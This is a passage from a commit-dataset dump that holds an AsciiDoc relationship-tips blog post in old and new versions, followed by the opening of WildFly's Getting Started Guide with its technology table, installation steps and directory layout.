each other what you\u2019re saying when you declare these magic words. It could be a list of many sentiments such as, \u201cI would do anything for you,\u201d and \u201cI trust you completely.\u201d\n. Take turns planning date nights that are actual, real, capital-D Dates \nTakeout and TV doesn\u2019t count.\n. Approach your partner\u2019s issues in the context of how they affect the relationship.\nIt\u2019ll reduce the chances they feel personally attacked for no reason.\n. Cuddle.\nMake ample time for cuddling. Whether or not it leads to sex, physical affection is important.\n. Don\u2019t forget to say \u201cI Like You.\u201d\nThe greatest compliment you can give a partner (especially a long-term partner) is reminding them that not only do you love them, but also like them.\n. Have a spontaneous midday tryst. \nSend him a text as he\u2019s about to go on his lunch break, take time out on a Saturday, however you want to play it.\nPhoto: Imaxtree\nPhoto: Imaxtree\n. Travel together.\nSeeing the world together creates amazing shared memories.\n. Tell them EXACTLY why you love and appreciate them as often as possible. \n\u201cI love you\u201d is good. \u201cI love the way you make sure no one ever feels left out\u201d is even better.\n. Stay out of their family drama. \nIt\u2019s so not worth it.\n. Really look at each other. \nWe spend a lot of time with our partners but sometimes we don\u2019t actually see them. Take the time to actually look into one another\u2019s eyes.\n. Give each other a pet name. \nIt may be super annoying to other people (and you may want to reserve it for when you\u2019re in private), but a pet name can add an extra layer of intimacy to your relationship.\n. Spend time alone.\nAs important as it is to spend quality time with your partner, it\u2019s equally necessary that you develop a good sense of who you are without them. Kahlil Gibran said \u201clet there be spaces in your togetherness,\u201d and we stand by that.\n. Eat at the dinner table. \nDo you eat in front of the TV? Try actually sitting down to a meal with your partner at an actual table. You may find it a welcome change.\n. In fact, turn the TV off all together. \nWhy not try instituting a TV-free night in your apartment? See what else happens when you spend time together sans the talking box.\n. Ask for clarity. \nIf you\u2019re confused about what your partner means, ask for clarity instead of making assumptions about what they mean. Use an open phrase like, \u201cWhat did you mean when you said, \u2018xyz'\u201d rather than instantly going on the offensive.\n. Own your feelings. \nPassive-aggressiveness is a total relationship killer. Quash it by practicing assertiveness and clarity. Saying \u201cI\u2019m fine\u201d when you\u2019re not fine is a prime example of not owning your feelings.\n. Communicate in a constructive way.\nFor instance, we think the phrase construction \u201cWhen ____ happens, it makes me feel ____\u201d can be particularly helpful.\n. Take an interest in what your partner\u2019s into.\nHe\u2019s into chess, or cheese, or cheese that looks like a chess board (maybe?). You don\u2019t have to love it, but give it a shot. You may surprise yourself!\n. But also cultivate your own. \nYou and your partner don\u2019t need to have everything in common. Seriously. That\u2019s actually really annoying.\n. Let your partner teach you something they\u2019re good at, and vice versa.\nEveryone\u2014everyone\u2014loves the feeling of being able to teach somebody they like about something they\u2019re good at.\n. Bring your groups together.\nIt\u2019s easy to silo your social lives and create separate his-and-hers worlds, but bringing your friends, siblings, or colleagues together can be a fun thing.\n. Don\u2019t forget about sex.\nWork, stress, and other responsibilities can get in the way of your sex life, and before you know it, you\u2019ve gone a month without getting busy. Don\u2019t let this happen. Schedule it in if you have to, just make sure to connect in an intimate way.\n. But do forget about jealousy.\nJealousy can be completely toxic to relationships, so keep yours in check. If you\u2019re always jealous, figure out if it\u2019s your personal issue, or if your partner is doing things to appear less trustworthy.\n. Cultivate your appreciation.\nSpread what you love about your partner. Practice your appreciation by sharing it with others\u2014 not in a gross, gratuitous, braggy way, but don\u2019t miss out on the opportunity to tell others why your partner is awesome. In turn, it\u2019ll remind you why you like them, too.\n. Laugh. In bed. \nSex should be sexy, sure. But it should also be fun. Don\u2019t be afraid to have a laugh if things take a turn for the ridiculous.\n. Let yourself be taken care of when you need it.We all need special care on occasion. Let your partner help you when you\u2019re feeling sick or down. It doesn\u2019t mean you\u2019re not strong, it just means you\u2019re willing to accept help.\n. Check your competitive edge.\nYou and your partner are there to support each other, not compete with one another. If you find yourself comparing yourself or competing with your significant other, check your behavior. That\u2019s not healthy!\n. Have a bed day.\nAllow yourselves a totally lazy day where you lie around and do nothing of note except enjoy each other\u2019s company.\n. Be kind to yourself.\nThe best way to develop positive patterns in a relationship is to develop them first with yourself. Don\u2019t be so critical of yourself, and you\u2019ll set a good example for your relationship.\n. Express gratitude for the little things, and for specific things. \nBig gestures are great, but it\u2019s great to recognize the little things your partner does that make you feel happy and loved, too.\nPhoto: Getty Images\nPhoto: Getty Images\n. Date like you dated in high school.\nAsk each other out. Get excited. Take forever to get ready. Make out. Repeat.\n. Be present. \nWe can ruin a perfectly great relationship by focusing too much on the past, or worrying too much about what may happen in the future. Learn to enjoy where you are, and who you\u2019re with right now.\n. Don\u2019t try to control.\nA relationship isn\u2019t a battle of wills, it\u2019s two people who are choosing to be together, so don\u2019t treat your partner like they\u2019re some kind of wild animal you\u2019re trying to tame.\n. Embrace your common goals.\nWhat is it that you both want to accomplish? Can you support each other to reach those goals? That\u2019ll be a big piece of what will hold you two to together as a couple in the long run.\n. Have a cultural experience together.\nSee a movie, a play, or an art exhibition together \u2014 and then talk about them afterward. You may be pleasantly surprised by how differently\u2014or similarly\u2014you viewed things.\n. Go on a long bike ride.\nBike rides are deeply freeing experiences, and it\u2019s nice to be able to do that with someone you love.\n. Try talking on the phone. Yes, we know this sounds crazy, but phone calls are a different sort of communication than texting, or even in person communicating will allow. You may actually deepen your connection through a phone chat.\n. Make a mix for each other. It\u2019s cute, romantic and something out of a rom-com. Although in this day and age, you might want to make a Spotify playlist rather than a mixed CD.\n. Keep yourself in check. We spend so much time paying attention to how our partners behave, but take a second to notice how you\u2019re acting \u2014 especially if you\u2019re fired up or in a bad mood. And then give yourself a second to\u2026\n. Breathe. Before you say something you don\u2019t mean, take a breath and ask yourself if that\u2019s really the way you want to move forward. Chances are, taking a second out will help you recalibrate and think of a more constructive way of handling the situation.\n. Help each other. This one is so easy, but if your partner\u2019s having a hard time with something \u2014 whether it\u2019s doing their taxes or organizing their closet \u2014 offer a helping hand.\n. Be their biggest cheerleader. If your partner\u2019s accomplished something amazing, let them know it, and let them shine.\n. In your craziest moments of frustration or anger, remember what it is that you like about them the most. There\u2019s a reason you\u2019re with them after all, right?\n. Remember that a relationship should always make your life better on the whole, not worse. And aim to make sure yours is doing just that. If it\u2019s not, it may be time to reconsider.\n. Enjoy the quiet moments you spend with each other. Not everything has to be a big adventure or a big deal Sometimes the best times are the quiet unplanned things you do together.\n. Make sure you\u2019re taking care of yourself. Don\u2019t let yourself get so invested in your partner that you forget to take care of yourself.\n. Let go of the past. We often let our past hurts dictate our present. Learn to let go of past resentments and fears in order to live more fully with your partner right now.\n100. Touch each other often. Simple touch builds intimacy \u2014 espeically non-sexual touch. It\u2019s a non-verbal way of saying, \u201cyes, I\u2019m here for you, and I care about you\u201d and it helps reinforce your emotional bond.\n101. The best relationships are ones in which both partners feel like the luckiest person in the world. Find ways to communicate that and foster that feeling in each other, and you\u2019ll be good.\n\n","old_contents":"= 101 Tips To Improve Your Relationship \n:hp-image: https:\/\/user-images.githubusercontent.com\/19504323\/34144297-e38e3492-e4cb-11e7-939e-27d271d97f4d.png\n:published_at: 2017-07-21\n:hp-tags: tips, relationship\n:hp-alt-title: 101 Tips To Improve Your Relationship\n:linkattrs:\n\n\nBeing part of a couple is hard, but the best relationship tips are really all about maintenance. You\u2019ve got to keep things fresh, find time for each other, and come up with ways to navigate the tricky ups and downs every partnership faces. That all sounds a lot easier than it really is, so we\u2019ve come up with 101 ways to make your relationship even better.\n\nFrom how to deal with jealousy to how to get over a potentially deadly lull, we\u2019ve got 101 relationship tips that you can start implementing right now.\n\nAlso Read: http:\/\/amzn.to\/2CCdNo4[How to Be an Adult in Relationships: The Five Keys to Mindful Loving^]\n\n1. Listen.\nIt might sound obvious, but when you really allow yourself to listen\u2014and ask questions about\u2014what your partner says, it not only leads to better conversations, but also better communication.\n2. Take a few days apart.\nMissing each other is a great way to reconnect. Try grabbing some girlfriends for an overnight or a weekend getaway every few months.\n3. Find a support team.\nHave a handful of great friends or family members you can call so your significant other doesn\u2019t have to hear every small grievance going on your life.\nMORE: 9 Things Every Woman Deserves in a Relationship\n4. Put away your phones.\nOne of the biggest relationship tips is to give your undivided attention when your partner is speaking. It\u2019s is one of the most important things you can do.\n5. Volunteer together.\nGiving back is a great way to keep perspective of how great your relationship is, and how lucky you both are.\n6. Create a checklist.\nJot down new and fun things you want to accomplish for a day as a duo.\n7. Talk to couples over 65 years old. \nGet relationship tips from them, and see what you can take away to apply to your relationship.\n8. Stop and appreciate all that your relationship is this very second.\nStop living for what it can be. This person is choosing to be in your life every day, not every day in the future.\n9. Revisit the questions you asked in the beginning.\nWhat are you hoping to accomplish in the next year? What are you scared of? These answers change, so we need to keep asking these questions.\n10. Find 10 things you really love about them and tell them. \nGuys need confidence boosters, too!\n11. Stop nagging. \nSeriously, stop. Take a step back and figure out the big things about your partner that truly bother you, and approach them from a place of concern and support instead of nitpicking for sport. That\u2019ll get you nowhere.\n12. Get over needing to be right. \nLearning to say \u201cI was wrong\u201d is a skill worth learning.\n13. Take care of yourself. \nNo relationship can be successful if you don\u2019t feel good about yourself, both inside and out.\n14. Know what you need and then ask for it.\nYou\u2019re dating a human, not a magical psychic.\n15. Take a class.\nIt\u2019s proven that couples who learn together connect deeper. Find some common ground (cooking? art? science?) and go from there. \n16. Stop complicating things that aren\u2019t complicated enough.\nDon\u2019t pull a Carrie Bradshaw during the Aiden years: If you bemoan the fact that your relationship is going too well, you might need to revisit why you\u2019re constantly seeking out drama.\n17. Assume that if something was said that hurt your feelings, it wasn\u2019t intended that way.\nWhy would they want to upset you or hurt you? Give your partner the benefit of the doubt, but if it\u2019s really bothering you, don\u2019t be afraid to bring it up.\n18. Write notes.\nWhether you have study hall together or live together, handwritten notes are personal touches in today\u2019s highly digital world. \n19. Pitch in.\nHelp each other with chores and other necessary, if banal, activities \u2014 cooking, cleaning, re-organizing, etc. Not doing them if you live together can create tension, and always doing them can create unfair expectations. Act as team of equals.\n20. Disconnect.\nStep away from the laptop during quality time. Everything on the Internet will still be there later.\nMORE: The Best Short-Lived Celebrity Relationships of 2016\n21. Allow things to be what they are.\nSometimes bad days and bad moods happen. Don\u2019t go crazy trying to make everything better. Just be supportive and loving, because just being there at the end of a bad day can make it better for both of you.\n22. Create mini-traditions.\nCreating small rituals can really help hold up a couple because they become \u201cyour thing.\u201d Whether it\u2019s a fancy night out during the holiday season, or watching a certain show every week, these are things that\u2019ll give you both something to look forward to, and it\u2019ll bring you closer together.\n23. Be an open book.\nThey can either deal with it or they can\u2019t, but if you can\u2019t be your most honest self with this person, it\u2019ll come out eventually.\n24. Compliment, and often.\nYou\u2019re there to make each other feel like your best selves, so let the genuine praise flow freely. Like his outfit? Tell him! Like her hair today? Let her know!\n25. Make promises that you really can keep.\nSay things that you want to follow through with out loud. It\u2019ll make you work harder to make them happen. Having\u2014and setting\u2014levels of reasonable expectations for your relationship is a healthy way to keep it strong.\n26. Acknowledge positive actions.\nWhen you and your partner see positive actions, solutions, or behavior in one another, acknowledge it and remind each other to keep it up.\n27. Establish genuine connections with the other\u2019s friends and family.\nHang out together with both of your friends and family. This is the stuff that makes the world go \u2019round, people!\n28. Pay attention to the tiny things that bother your partner, and if it\u2019s painless for you, work to change them. \nWe\u2019re not talking changing your laugh or your style, but if you know that your partner really hates it when you leave the kitchen counter cluttered, try to make a point of clearing it off before he gets home. It\u2019s an easy enough thing to do and it makes their day better, so why not?\n29. Never, never forget to ask about the other person\u2019s day. \nIt\u2019s such an easy slight to avoid!\n30. Only one person gets to have the bad day. \nIf your partner\u2019s day sucked and yours was just \u201ceh,\u201d let them have the pity (and the control of the remote, and the choice of take-out). If it\u2019s you, announce it early and let them know you need the support. If it\u2019s a toss-up, trade stories about why your days were so awful and you\u2019ll end up laughing while trying to figure out who wins.\n31. Small gifts go a long way.\nBringing home a pack of their favorite candy\/magazine\/book by a favorite author never gets old.\n32. Graham Parsons has a song lyric that says \u201cI just want to hold you, I don\u2019t want to hold you down.\u201d\nLet that be your motto when you\u2019re giving your partner advice.\n33. Log onto Instagram and like all their photos.\nJust because.\n34. Plan a date where you revisit the spot you went on your first date.\nRemember all the amazing things that brought you from then to now.\n35. Go on a walk together somewhere beautiful.\nAnd don\u2019t forget to turn off your cell phones.\n36. Surprise them with dinner.\nOne unexpected night, surprise your partner with a home-cooked meal, and a nicely-set table.\n37. Review your top five favorite funny things your partner has done.\nBecause your partner is funny! That\u2019s part of why you like them.\n38. Go to a yoga class together.\nOr other exercise class together. Your body and relationship will thank you!\n39. Go on a road trip, even if you\u2019re not going anywhere far. \nIt\u2019s nice to get out of town sometimes.\n40. Pick up a six-pack of toilet paper or (even better) a six-pack of beer.\nWithout even being asked.\n41. Keep the surprises coming.\nThink of your relationship as a creative challenge. To keep the romance fresh, come up with new date ideas, new sex positions, and new ways to demonstrate your love.\n42. Plan small outings.\nWhether its brunch this weekend, or a trip to a new neighborhood.\n43. Make out.\nKissing is something that is often set to the side the longer a couple has been together. Out of blue one day, initiate a high-school style make-out session.\n44. Let it go.\nDon\u2019t hold onto that thing your lover said or did six months ago and bring it up each time you get mad at him. Do both of you a favor and let it go\n45. Don\u2019t interrupt. \nEven if what you think your significant other is saying is uninteresting, don\u2019t bulldoze over his or her words. Being able to listen to each other\u2014even when the details are mundane\u2014is important.\n46. Say thanks. \nLet him know that you notice the little things he does by saying thank you for routine tasks like walking the dog or picking up groceries.\n47. Cook a meal together.\nCome up with a menu, shop, and prepare the food together.\n48. Have fun with hypotheticals.\nConversation can become routine. Break from the ordinary and have a silly dinner conversation made entirely of imaginary situations\u2014for example, \u201cIf you were on an island and could only bring five movies, which movies would you bring?\n49. Keep a couple\u2019s journal. \nWrite down your desires and fantasies and leave them out for your significant other to find\u2014encourage him to write back.\n50. Agree to disagree. \nThis is one of the most important relationship tips, as you both have strong opinions and therefore some issues will never be resolved. Respect each other\u2019s point of view and agree not to argue about the same issue, unless it\u2019s something that could get in the way of your future, like politics, religion, or values.+++<div id=\"amzn-assoc-ad-362ca55c-c25e-4b62-99e7-044b18860126\"><\/div><script async src=\"\/\/z-na.amazon-adsystem.com\/widgets\/onejs?MarketPlace=US&adInstanceId=362ca55c-c25e-4b62-99e7-044b18860126\"><\/script>+++\n51. Set goals. \nIn addition to setting life goals, set relationship goals. For example: We aim to spend more time together outside rather than in front of the TV.\n52. Take responsibility for your own happiness\nLove is grand, but at the end of the day the only person we can hold accountable for our happiness is ourselves. Do volunteer work, exercise, host dinner parties\u2014find what satisfies you, and go from there.\nMORE: WTF! Taylor Swift Has Never Walked a Red Carpet with a Boyfriend\n53. Learn each other\u2019s conflict habits.\nMake an effort to understand you and your partner\u2019s conflict habits so you can break bad patterns and find a middle ground that\u2019s productive and respectful.\n54. Define love. \nWhile \u201cI love you,\u201d is an extraordinary thing to say\u2014and an equally wonderful thing to hear\u2014it means something different to each person. Tell each other what you\u2019re saying when you declare these magic words. It could be a list of many sentiments such as, \u201cI would do anything for you,\u201d and \u201cI trust you completely.\u201d\n55. Take turns planning date nights that are actual, real, capital-D Dates \nTakeout and TV doesn\u2019t count.\n56. Approach your partner\u2019s issues in the context of how they affect the relationship.\nIt\u2019ll reduce the chances they feel personally attacked for no reason.\n57. Cuddle.\nMake ample time for cuddling. Whether or not it leads to sex, physical affection is important.\n58. Don\u2019t forget to say \u201cI Like You.\u201d\nThe greatest compliment you can give a partner (especially a long-term partner) is reminding them that not only do you love them, but also like them.\n59. Have a spontaneous midday tryst. \nSend him a text as he\u2019s about to go on his lunch break, take time out on a Saturday, however you want to play it.\nPhoto: Imaxtree\nPhoto: Imaxtree\n60. Travel together.\nSeeing the world together creates amazing shared memories.\n61. Tell them EXACTLY why you love and appreciate them as often as possible. \n\u201cI love you\u201d is good. \u201cI love the way you make sure no one ever feels left out\u201d is even better.\n62. Stay out of their family drama. \nIt\u2019s so not worth it.\n63. Really look at each other. \nWe spend a lot of time with our partners but sometimes we don\u2019t actually see them. Take the time to actually look into one another\u2019s eyes.\n64. Give each other a pet name. \nIt may be super annoying to other people (and you may want to reserve it for when you\u2019re in private), but a pet name can add an extra layer of intimacy to your relationship.\n65. Spend time alone.\nAs important as it is to spend quality time with your partner, it\u2019s equally necessary that you develop a good sense of who you are without them. Kahlil Gibran said \u201clet there be spaces in your togetherness,\u201d and we stand by that.\n66. Eat at the dinner table. \nDo you eat in front of the TV? Try actually sitting down to a meal with your partner at an actual table. You may find it a welcome change.\n67. In fact, turn the TV off all together. \nWhy not try instituting a TV-free night in your apartment? See what else happens when you spend time together sans the talking box.\n68. Ask for clarity. \nIf you\u2019re confused about what your partner means, ask for clarity instead of making assumptions about what they mean. Use an open phrase like, \u201cWhat did you mean when you said, \u2018xyz'\u201d rather than instantly going on the offensive.\n69. Own your feelings. \nPassive-aggressiveness is a total relationship killer. Quash it by practicing assertiveness and clarity. Saying \u201cI\u2019m fine\u201d when you\u2019re not fine is a prime example of not owning your feelings.\n70. Communicate in a constructive way.\nFor instance, we think the phrase construction \u201cWhen ____ happens, it makes me feel ____\u201d can be particularly helpful.\n71. Take an interest in what your partner\u2019s into.\nHe\u2019s into chess, or cheese, or cheese that looks like a chess board (maybe?). You don\u2019t have to love it, but give it a shot. You may surprise yourself!\n72. But also cultivate your own. \nYou and your partner don\u2019t need to have everything in common. Seriously. That\u2019s actually really annoying.\n73. Let your partner teach you something they\u2019re good at, and vice versa.\nEveryone\u2014everyone\u2014loves the feeling of being able to teach somebody they like about something they\u2019re good at.\n74. Bring your groups together.\nIt\u2019s easy to silo your social lives and create separate his-and-hers worlds, but bringing your friends, siblings, or colleagues together can be a fun thing.\n75. Don\u2019t forget about sex.\nWork, stress, and other responsibilities can get in the way of your sex life, and before you know it, you\u2019ve gone a month without getting busy. Don\u2019t let this happen. Schedule it in if you have to, just make sure to connect in an intimate way.\n76. But do forget about jealousy.\nJealousy can be completely toxic to relationships, so keep yours in check. If you\u2019re always jealous, figure out if it\u2019s your personal issue, or if your partner is doing things to appear less trustworthy.\n77. Cultivate your appreciation.\nSpread what you love about your partner. Practice your appreciation by sharing it with others\u2014 not in a gross, gratuitous, braggy way, but don\u2019t miss out on the opportunity to tell others why your partner is awesome. In turn, it\u2019ll remind you why you like them, too.\n78. Laugh. In bed. \nSex should be sexy, sure. But it should also be fun. Don\u2019t be afraid to have a laugh if things take a turn for the ridiculous.\n79. Let yourself be taken care of when you need it.We all need special care on occasion. Let your partner help you when you\u2019re feeling sick or down. It doesn\u2019t mean you\u2019re not strong, it just means you\u2019re willing to accept help.\n80. Check your competitive edge.\nYou and your partner are there to support each other, not compete with one another. If you find yourself comparing yourself or competing with your significant other, check your behavior. That\u2019s not healthy!\n81. Have a bed day.\nAllow yourselves a totally lazy day where you lie around and do nothing of note except enjoy each other\u2019s company.\n81. Be kind to yourself.\nThe best way to develop positive patterns in a relationship is to develop them first with yourself. Don\u2019t be so critical of yourself, and you\u2019ll set a good example for your relationship.\n82. Express gratitude for the little things, and for specific things. \nBig gestures are great, but it\u2019s great to recognize the little things your partner does that make you feel happy and loved, too.\nPhoto: Getty Images\nPhoto: Getty Images\n83. Date like you dated in high school.\nAsk each other out. Get excited. Take forever to get ready. Make out. Repeat.\n84. Be present. \nWe can ruin a perfectly great relationship by focusing too much on the past, or worrying too much about what may happen in the future. Learn to enjoy where you are, and who you\u2019re with right now.\n85. Don\u2019t try to control.\nA relationship isn\u2019t a battle of wills, it\u2019s two people who are choosing to be together, so don\u2019t treat your partner like they\u2019re some kind of wild animal you\u2019re trying to tame.\n86. Embrace your common goals.\nWhat is it that you both want to accomplish? Can you support each other to reach those goals? That\u2019ll be a big piece of what will hold you two to together as a couple in the long run.\n87. Have a cultural experience together.\nSee a movie, a play, or an art exhibition together \u2014 and then talk about them afterward. You may be pleasantly surprised by how differently\u2014or similarly\u2014you viewed things.\n88. Go on a long bike ride.\nBike rides are deeply freeing experiences, and it\u2019s nice to be able to do that with someone you love.\n89. Try talking on the phone.\nYes, we know this sounds crazy, but phone calls are a different sort of communication than texting, or even in person communicating will allow. You may actually deepen your connection through a phone chat.\n90. Make a mix for each other. \nIt\u2019s cute, romantic and something out of a rom-com. Although in this day and age, you might want to make a Spotify playlist rather than a mixed CD.\n91. Keep yourself in check.\nWe spend so much time paying attention to how our partners behave, but take a second to notice how you\u2019re acting \u2014 especially if you\u2019re fired up or in a bad mood. And then give yourself a second to\u2026\n92. \u2026 Breathe. \nBefore you say something you don\u2019t mean, take a breath and ask yourself if that\u2019s really the way you want to move forward. Chances are, taking a second out will help you recalibrate and think of a more constructive way of handling the situation.\n93. Help each other.\nThis one is so easy, but if your partner\u2019s having a hard time with something \u2014 whether it\u2019s doing their taxes or organizing their closet \u2014 offer a helping hand.\n94. Be their biggest cheerleader\nIf your partner\u2019s accomplished something amazing, let them know it, and let them shine.\n95. In your craziest moments of frustration or anger, remember what it is that you like about them the most. \nThere\u2019s a reason you\u2019re with them after all, right?\n96. Remember that a relationship should always make your life better on the whole, not worse.\nAnd aim to make sure yours is doing just that. If it\u2019s not, it may be time to reconsider.\n97. Enjoy the quiet moments you spend with each other. \nNot everything has to be a big adventure or a big deal Sometimes the best times are the quiet unplanned things you do together.\n98. Make sure you\u2019re taking care of yourself.\nDon\u2019t let yourself get so invested in your partner that you forget to take care of yourself.\n99. Let go of the past.\nWe often let our past hurts dictate our present. Learn to let go of past resentments and fears in order to live more fully with your partner right now.\n100. Touch each other often.\nSimple touch builds intimacy \u2014 espeically non-sexual touch. It\u2019s a non-verbal way of saying, \u201cyes, I\u2019m here for you, and I care about you\u201d and it helps reinforce your emotional bond.\n101. The best relationships are ones in which both partners feel like the luckiest person in the world. \nFind ways to communicate that and foster that feeling in each other, and you\u2019ll be good.\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d5f0bce8b8897fdd09a4a3bf772d963a81165ca6","subject":"[WFLY-14646] Correct the structure of the Getting Started Guide, plus some misc improvements","message":"[WFLY-14646] Correct the structure of the Getting Started Guide, plus some misc improvements\n","repos":"jstourac\/wildfly,pferraro\/wildfly,jstourac\/wildfly,wildfly\/wildfly,rhusar\/wildfly,rhusar\/wildfly,iweiss\/wildfly,iweiss\/wildfly,pferraro\/wildfly,iweiss\/wildfly,wildfly\/wildfly,iweiss\/wildfly,pferraro\/wildfly,pferraro\/wildfly,rhusar\/wildfly,jstourac\/wildfly,rhusar\/wildfly,jstourac\/wildfly,wildfly\/wildfly,wildfly\/wildfly","old_file":"docs\/src\/main\/asciidoc\/Getting_Started_Guide.adoc","new_file":"docs\/src\/main\/asciidoc\/Getting_Started_Guide.adoc","new_contents":"[[Getting_Started_Guide]]\n= Getting Started Guide\nWildFly team;\n:revnumber: {version}\n:revdate: {localdate}\n:toc: macro\n:toclevels: 3\n:toc-title: Getting Started Guide\n:doctype: book\n:icons: font\n:source-highlighter: coderay\nifdef::env-github[:imagesdir: images\/]\n\n\/\/ ifndef::ebook-format[:leveloffset: 1]\n\n(C) 2017 The original authors.\n\nifdef::basebackend-html[toc::[]]\n:numbered:\n\n[[getting-started-with-wildfly]]\n== Getting Started with WildFly {wildflyVersion}\n\nWildFly {wildflyVersion} is the latest release in a series of JBoss open-source\napplication server offerings. WildFly {wildflyVersion} is an exceptionally fast,\nlightweight and powerful implementation of the Jakarta\nPlatform specifications. The state-of-the-art architecture built on the\nModular Service Container enables services on-demand when your\napplication requires them. The table below lists the technologies available in WildFly {wildflyVersion}\nserver configuration profiles.\n\n[cols=\",,,,\",options=\"header\"]\n|=======================================================================\n|Jakarta EE Platform Technology |Jakarta EE Full Platform |Jakarta EE Web\nProfile |WildFly {wildflyVersion} Full Platform |WildFly {wildflyVersion} Web Profile\n\n|Jakarta WebSocket |X |X |X |X\n\n|Jakarta JSON Processing 1.1 |X |X |X |X\n\n|Jakarta JSON Binding Specification 1.0 |X |X |X |X\n\n|Jakarta Servlet 4.0 |X |X |X |X\n\n|Jakarta Server Faces 2.3 |X |X |X |X\n\n|Jakarta Expression Language 3.0 |X |X |X |X\n\n|Jakarta Server Pages 2.3 |X |X |X |X\n\n|Jakarta Standard Tag Library 1.2 |X |X |X\n|X\n\n|Jakarta Batch 1.0 |X |-- |X |--\n\n|Jakarta Concurrency |X |X |X |X\n\n|Jakarta Contexts and Dependency Injection 2.0 |X |X |X |X\n\n|Jakarta Dependency Injection |X |X |X |X\n\n|Jakarta Bean Validation 2.0 |X |X |X |X\n\n|Jakarta Enterprise Beans 3.2 |XCMP 2.0Optional |X(Lite) |XCMP\n2.0Not Available |X(Lite)\n\n|Jakarta Interceptors 1.2 |X |X |X |X\n\n|Jakarta Connectors 1.7 |X |-- |X |X\n\n|Jakarta Persistence 2.2 |X |X |X |X\n\n|Jakarta Annotations 1.3 |X |X |X |X\n\n|Jakarta Messaging 2.0 |X |-- |X |--\n\n|Jakarta Transactions 1.3 |X |X |X |X\n\n|Jakarta Mail 1.6 |X |-- |X |X\n\n|Jakarta RESTful Web Services 2.1 |X |X |X |X\n\n|Jakarta Enterprise Web Services 1.3 |X |-- |X |--\n\n|Jakarta XML Web Services Specification 2.3 |X |X |X |X\n\n|Jakarta Web Services Metadata |X |-- |X |--\n\n|Jakarta XML RPC 1.1 |Optional |-- |-- |--\n\n|Jakarta SOAP with Attachments 1.3 |X |-- |X |--\n\n|Jakarta XML Registries |Optional |-- |-- |--\n\n|Jakarta XML Binding Specification 2.3 |X |X |X |X\n\n|Jakarta Authentication 1.1 |X |-- |X |--\n\n|Jakarta Authorization 1.5 |X |-- |X |--\n\n|Jakarta EE Application Deployment 1.2 |Optional |-- |-- |--\n\n|Jakarta Management 1.1 |X |\u00a0 |X |\u00a0\n\n|Jakarta Debugging Support for Other Languages 1.0 |X |X |X |X\n\n|Jakarta Security 1.0 |X |X |X |X\n|=======================================================================\n\nMissing ActiveMQ Artemis and Jakarta Messaging?\n\n[WARNING]\n\nThe WildFly Web Profile doesn't include Jakarta Messaging (provided by ActiveMQ Artemis) by\ndefault. If you want to use messaging, make sure you start the server\n using the \"Full Platform\" configuration.\n\nThis document provides a quick overview on how to download and get\nstarted using WildFly {wildflyVersion} for your application development. For in-depth\ncontent on administrative features, refer to the WildFly {wildflyVersion} Admin Guide.\n\n[[requirements]]\n== Requirements\n\n* Java SE 8 or later. We recommend that you use the latest available update\nof the current long-term support Java release.\n\n\n[[installation-options]]\n== Installation Options\n\nThere are a number of ways you can install WildFly, including unzipping our traditional download zip, provisioning a\ncustom installation using Galleon, or building a bootable jar. The link:Installation_Guide{outfilesuffix}[Installation Guide]\nhelps you identify the kind of WildFly installation that best fits your application's deployment needs. In this guide\nwe'll focus on the common approach of installing the download zip.\n\n[[download]]\n=== Download\n\nWildFly {wildflyVersion} distributions can be obtained from:\n\nhttp:\/\/www.wildfly.org\/downloads\/[wildfly.org\/downloads]\n\nWildFly {wildflyVersion} provides a single distribution available in zip or tar file\nformats.\n\n* *wildfly-{wildflyVersion}.0.0.Final.zip*\n* *wildfly-{wildflyVersion}.0.0.Final.tar.gz*\n\n[[installation]]\n=== Installation\n\nSimply extract your chosen download to the directory of your choice. You\ncan install WildFly {wildflyVersion} on any operating system that supports the zip or\ntar formats. Refer to the Release Notes for additional information\nrelated to the release.\n\n[[wildfly---a-quick-tour]]\n== WildFly - A Quick Tour\n\nNow that you've downloaded WildFly {wildflyVersion}, the next thing to discuss is the\nlayout of the distribution and explore the server directory structure,\nkey configuration files, log files, user deployments and so on. It's\nworth familiarizing yourself with the layout so that you'll be able to\nfind your way around when it comes to deploying your own applications.\n\n[[wildfly-directory-structure]]\n=== WildFly Directory Structure\n\n[cols=\",\",options=\"header\"]\n|=======================================================================\n|DIRECTORY |DESCRIPTION\n\n|appclient |Configuration files, deployment content, and writable areas\nused by the application client container run from this installation.\n\n|bin |Start up scripts, start up configuration files and various command\nline utilities like Vault, add-user and Java diagnostic reportavailable\nfor Unix and Windows environments\n\n|bin\/client |Contains a client jar for use by non-maven based clients.\n\n|docs\/schema |XML schema definition files\n\n|docs\/examples\/configs |Example configuration files representing\nspecific use cases\n\n|domain |Configuration files, deployment content, and writable areas\nused by the domain mode processes run from this installation.\n\n|modules |WildFly is based on a modular classloading architecture.\nThe various modules used in the server are stored here.\n\n|standalone |Configuration files, deployment content, and writable areas\nused by the single standalone server run from this installation.\n\n|welcome-content |Default Welcome Page content\n|=======================================================================\n\n[[standalone-directory-structure]]\n==== Standalone Directory Structure\n\nIn \" *_standalone_* \" mode each WildFly {wildflyVersion} server instance is an\nindependent process (similar to previous JBoss AS versions; e.g., 3, 4,\n5, or 6). The configuration files, deployment content and writable areas\nused by the single standalone server run from a WildFly installation are\nfound in the following subdirectories under the top level \"standalone\"\ndirectory:\n\n[cols=\",\",options=\"header\"]\n|=======================================================================\n|DIRECTORY |DESCRIPTION\n\n|configuration |Configuration files for the standalone server that runs\noff of this installation. All configuration information for the running\nserver is located here and is the single place for configuration\nmodifications for the standalone server.\n\n|data |Persistent information written by the server to survive a restart\nof the server\n\n|deployments |End user deployment content can be placed in this\ndirectory for automatic detection and deployment of that content into\nthe server's runtime.NOTE: The server's management API is recommended\nfor installing deployment content. File system based deployment scanning\ncapabilities remain for developer convenience.\n\n|lib\/ext |Location for installed library jars referenced by applications\nusing the Extension-List mechanism\n\n|log |standalone server log files\n\n|tmp |location for temporary files written by the server\n\n|tmp\/auth |Special location used to exchange authentication tokens with\nlocal clients so they can confirm that they are local to the running AS\nprocess.\n|=======================================================================\n\n[[domain-directory-structure]]\n==== Domain Directory Structure\n\nA key feature of WildFly {wildflyVersion} is the managing multiple servers from a\nsingle control point. A collection of multiple servers are referred to\nas a \" *_domain_* \". Domains can span multiple physical (or virtual)\nmachines with all WildFly instances on a given host under the control of\na Host Controller process. The Host Controllers interact with the Domain\nController to control the lifecycle of the WildFly instances running on\nthat host and to assist the Domain Controller in managing them. The\nconfiguration files, deployment content and writeable areas used by\ndomain mode processes run from a WildFly installation are found in the\nfollowing subdirectories under the top level \"domain\" 